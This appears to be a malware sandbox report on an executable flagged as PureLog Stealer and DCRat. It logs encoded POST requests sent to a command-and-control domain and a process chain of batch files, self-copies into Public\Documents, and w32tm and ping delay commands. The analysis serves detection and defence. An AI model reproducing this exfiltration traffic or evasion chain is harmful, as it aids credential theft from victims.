Dec 22, 2024 15:45:51.363115072 CET	344	OUT	Data Raw: 00 04 04 00 06 01 04 01 05 06 02 01 02 06 01 0a 00 01 05 0b 02 0d 03 00 07 03 0d 54 06 02 01 07 0a 02 06 00 07 06 06 01 0c 0a 05 06 07 57 06 04 07 04 0e 0b 0e 01 04 07 07 0e 06 0d 05 00 06 0a 00 05 0f 0e 04 0f 06 52 0c 53 0b 02 0d 56 0f 07 07 50 Data Ascii: TWRSVPUR\L}P\|si]crn\buRkb^v\|pMM^DxBx_{`qZkm{Qtdpie~V@Bzm~LbW
Dec 22, 2024 15:45:52.278011084 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:45:52.512696028 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:45:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	50021	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:46:04.402642965 CET	349	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:46:04.753720045 CET	344	OUT	Data Raw: 00 01 04 04 06 01 01 03 05 06 02 01 02 07 01 00 00 06 05 0b 02 0c 03 0a 00 52 0d 57 06 01 06 03 0d 02 04 0a 02 0d 03 02 0e 00 07 51 05 53 02 05 06 06 0c 01 0e 01 01 00 01 05 07 01 05 0b 00 0a 00 51 0e 0d 07 00 04 04 0e 52 0e 57 0a 0d 0d 04 06 0d Data Ascii: RWQSQRWV\L}Q\|Yfc[}v[x\|awRw]\|`wX{o{lcu[hmsP`^p~u~V@AxCbLry
Dec 22, 2024 15:46:05.676282883 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:46:05.912935972 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:46:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	50022	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:46:18.167835951 CET	313	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:46:18.520056009 CET	344	OUT	Data Raw: 00 02 04 06 06 00 01 07 05 06 02 01 02 07 01 07 00 0a 05 0d 02 01 03 0b 00 0e 0a 04 04 0f 00 08 0d 06 07 59 00 57 03 02 0f 53 04 07 05 01 05 53 04 53 0b 0a 0d 03 06 0b 06 05 04 54 04 52 05 0c 00 50 0f 5a 05 51 05 08 0c 01 0e 02 0e 07 0d 04 05 0d Data Ascii: YWSSSTRPZQPW\L~k`~wLz^vvthlTYtosY]XllUl^rkkPwwQ]i_~V@A{}\~b}
Dec 22, 2024 15:46:19.441596985 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:46:19.680744886 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:46:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	50023	37.44.238.250	80

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 15:46:31.036214113 CET	313	OUT	POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 228472cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 22, 2024 15:46:31.394531012 CET	344	OUT	Data Raw: 05 01 04 05 06 0b 04 00 05 06 02 01 02 04 01 02 00 03 05 08 02 04 03 01 01 06 0a 0d 03 03 01 05 0c 06 06 5b 07 05 04 55 0f 03 05 01 07 57 04 00 04 50 0e 0b 0d 50 07 07 07 06 03 03 01 04 07 58 05 07 0e 09 00 02 05 05 0f 02 0f 02 0d 07 0e 09 07 07 Data Ascii: [UWPPXPYZP\L~~`rcq~YbflRyvoh~cc_oRdYz`[YS\|@cgtu~V@@xmvA}r[
Dec 22, 2024 15:46:32.306847095 CET	25	IN	HTTP/1.1 100 Continue
Dec 22, 2024 15:46:32.546170950 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 22 Dec 2024 14:46:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 213 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Target ID:	0
Start time:	09:42:22
Start date:	22/12/2024
Path:	C:\Users\user\Desktop\vb8DOBZQ4X.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\vb8DOBZQ4X.exe"
Imagebase:	0x150000
File size:	3'656'704 bytes
MD5 hash:	67EFB6282221428E7FF63B87DF2F6522
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1682176987.0000000000152000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1740017293.0000000012B14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:42:27
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tzbRZhAhjd.bat"
Imagebase:	0x7ff6e61f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:42:27
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:42:28
Start date:	22/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61d710000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:42:28
Start date:	22/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6ae3d0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:42:33
Start date:	22/12/2024
Path:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Imagebase:	0x410000
File size:	3'656'704 bytes
MD5 hash:	67EFB6282221428E7FF63B87DF2F6522
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:42:38
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat"
Imagebase:	0x7ff6e61f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:42:38
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:42:38
Start date:	22/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61d710000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:42:38
Start date:	22/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff738c90000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:42:47
Start date:	22/12/2024
Path:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Imagebase:	0x4e0000
File size:	3'656'704 bytes
MD5 hash:	67EFB6282221428E7FF63B87DF2F6522
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:42:52
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat"
Imagebase:	0x7ff6e61f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	09:42:52
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	09:42:52
Start date:	22/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61d710000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:42:53
Start date:	22/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff738c90000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:43:02
Start date:	22/12/2024
Path:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Imagebase:	0x960000
File size:	3'656'704 bytes
MD5 hash:	67EFB6282221428E7FF63B87DF2F6522
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:43:07
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat"
Imagebase:	0x7ff6e61f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:43:07
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	09:43:07
Start date:	22/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61d710000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:43:08
Start date:	22/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff738c90000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	09:43:17
Start date:	22/12/2024
Path:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Imagebase:	0x30000
File size:	3'656'704 bytes
MD5 hash:	67EFB6282221428E7FF63B87DF2F6522
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:43:21
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZLKnXXaim4.bat"
Imagebase:	0x7ff6e61f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	09:43:22
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	09:43:22
Start date:	22/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61d710000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	09:43:22
Start date:	22/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6ae3d0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	09:43:27
Start date:	22/12/2024
Path:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Imagebase:	0xe90000
File size:	3'656'704 bytes
MD5 hash:	67EFB6282221428E7FF63B87DF2F6522
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	09:43:33
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dvHErHhaAz.bat"
Imagebase:	0x7ff6e61f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	09:43:33
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	09:43:33
Start date:	22/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61d710000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	09:43:33
Start date:	22/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6ae3d0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	09:43:38
Start date:	22/12/2024
Path:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Imagebase:	0xc0000
File size:	3'656'704 bytes
MD5 hash:	67EFB6282221428E7FF63B87DF2F6522
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	09:43:44
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EAk7xcglkE.bat"
Imagebase:	0x7ff6e61f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	09:43:44
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	09:43:44
Start date:	22/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6ec4b0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	09:43:44
Start date:	22/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff738c90000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	09:43:53
Start date:	22/12/2024
Path:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Imagebase:	0x70000
File size:	3'656'704 bytes
MD5 hash:	67EFB6282221428E7FF63B87DF2F6522
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	09:43:58
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZxWzsCgC4b.bat"
Imagebase:	0x7ff6e61f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	09:43:58
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	09:43:59
Start date:	22/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61d710000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	09:43:59
Start date:	22/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6ae3d0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	09:44:04
Start date:	22/12/2024
Path:	C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe"
Imagebase:	0x9e0000
File size:	3'656'704 bytes
MD5 hash:	67EFB6282221428E7FF63B87DF2F6522
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	09:44:10
Start date:	22/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xtlNdaBxkU.bat"
Imagebase:	0x7ff6e61f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	09:44:10
Start date:	22/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	09:44:10
Start date:	22/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff61d710000
